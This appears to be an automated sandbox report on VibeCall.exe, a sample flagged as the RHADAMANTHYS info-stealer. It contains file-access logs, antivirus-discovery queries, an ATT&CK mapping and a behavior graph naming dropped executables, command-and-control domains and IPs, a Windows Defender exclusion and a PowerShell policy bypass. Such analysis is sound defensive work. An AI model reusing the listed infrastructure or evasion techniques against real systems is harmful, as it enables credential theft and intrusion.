                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_3_013B7C40 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,14_3_013B7C40
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: VibeCall.exe, 00000000.00000003.2211200780.000001CCB5C5C000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.2214515021.000001CCB5C66000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.2212397068.000001CCB5C97000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.2213028362.000001CCB5CC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected RHADAMANTHYS Stealer
                      Source: Yara matchFile source: 0000001F.00000003.2481606661.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2589680228.00000000014B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000003.2594352745.0000000002D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.2473382208.00000000015A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2462236062.0000000003080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2488910018.0000000003020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.2541414419.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.2443435539.00000000003E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000002.2681935017.0000000003290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000003.2438929795.00000000013F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2600997178.0000000001990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Yara detected RHADAMANTHYS Stealer
                      Source: Yara matchFile source: 0000001F.00000003.2481606661.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2589680228.00000000014B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000003.2594352745.0000000002D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.2473382208.00000000015A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2462236062.0000000003080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2488910018.0000000003020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.2541414419.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.2443435539.00000000003E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000002.2681935017.0000000003290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000003.2438929795.00000000013F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2600997178.0000000001990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 31_2_056EAB70 socket,WSAGetLastError,SetHandleInformation,GetLastError,closesocket,bind,WSAGetLastError,31_2_056EAB70

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts141
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		11
                      Process Injection                      		1
                      Masquerading                      		21
                      Input Capture                      		1
                      System Time Discovery                      		Remote Services21
                      Input Capture                      		1
                      Web Service                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      PowerShell                      		Boot or Logon Initialization Scripts1
                      DLL Side-Loading                      		11
                      Disable or Modify Tools                      		LSASS Memory361
                      Security Software Discovery                      		Remote Desktop Protocol1
                      Archive Collected Data                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)161
                      Virtualization/Sandbox Evasion                      		Security Account Manager1
                      Process Discovery                      		SMB/Windows Admin SharesData from Network Shared Drive11
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                      Process Injection                      		NTDS161
                      Virtualization/Sandbox Evasion                      		Distributed Component Object ModelInput Capture12
                      Ingress Tool Transfer                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information                      		LSA Secrets1
                      Application Window Discovery                      		SSHKeylogging3
                      Non-Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                      Obfuscated Files or Information                      		Cached Domain Credentials1
                      System Network Configuration Discovery                      		VNCGUI Input Capture124
                      Application Layer Protocol                      		Data Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      DLL Side-Loading                      		DCSync144
                      System Information Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1627611 Sample: VibeCall.exe Startdate: 02/03/2025 Architecture: WINDOWS Score: 96 59 pastebin.com 2->59 61 rustaisolutionnorisk.com 2->61 63 2 other IPs or domains 2->63 83 Suricata IDS alerts for network traffic 2->83 85 Found malware configuration 2->85 87 Yara detected RHADAMANTHYS Stealer 2->87 91 5 other signatures 2->91 10 VibeCall.exe 17 2->10         started        signatures3 89 Connects to a pastebin service (likely for C&C) 59->89 process4 dnsIp5 77 ip-api.com 208.95.112.1 TUT-ASUS United States 10->77 79 147.45.60.20 FREE-NET-ASFREEnetEU Russian Federation 10->79 81 2 other IPs or domains 10->81 51 C:\Users\...\videosolution_vibecall_b.exe, PE32 10->51 dropped 53 C:\Users\...\soundsolution_vibecall_c.exe, PE32 10->53 dropped 55 C:\Users\...\contry_solution_vibecall_e.exe, PE32 10->55 dropped 57 C:\Users\user\...\aisolution_vibecall_a.exe, PE32 10->57 dropped 97 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 10->97 99 Bypasses PowerShell execution policy 10->99 101 Adds a directory exclusion to Windows Defender 10->101 15 aisolution_vibecall_a.exe 1 10->15         started        18 videosolution_vibecall_b.exe 10->18         started        20 contry_solution_vibecall_e.exe 10->20         started        22 4 other processes 10->22 file6 signatures7 process8 dnsIp9 103 Multi AV Scanner detection for dropped file 15->103 105 Switches to a custom stack to bypass stack traces 15->105 25 fontdrvhost.exe 15->25         started        29 WerFault.exe 2 15->29         started        31 WerFault.exe 15->31         started        33 fontdrvhost.exe 18->33         started        39 2 other processes 18->39 35 fontdrvhost.exe 20->35         started        41 2 other processes 20->41 65 pastebin.com 104.20.4.235, 443, 49740 CLOUDFLARENETUS United States 22->65 107 Antivirus detection for dropped file 22->107 109 Loading BitLocker PowerShell Module 22->109 37 conhost.exe 22->37         started        43 2 other processes 22->43 signatures10 process11 dnsIp12 67 171.22.120.233 DEDIPATH-LLCUS Latvia 25->67 93 Performs DNS queries to domains with low reputation 25->93 95 Switches to a custom stack to bypass stack traces 25->95 45 fontdrvhost.exe 25->45         started        69 45.129.185.24 VDI-NETWORKUS Russian Federation 33->69 47 fontdrvhost.exe 33->47         started        71 api.mirrow1-dell.xyz 35->71 73 api.mirrow1-dell.xyz 79.141.168.8 TELE-ASTeleAsiaLimitedHK Bulgaria 35->73 75 104.16.248.249 CLOUDFLARENETUS United States 35->75 signatures13 process14 process15 49 WerFault.exe 45->49         started       

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.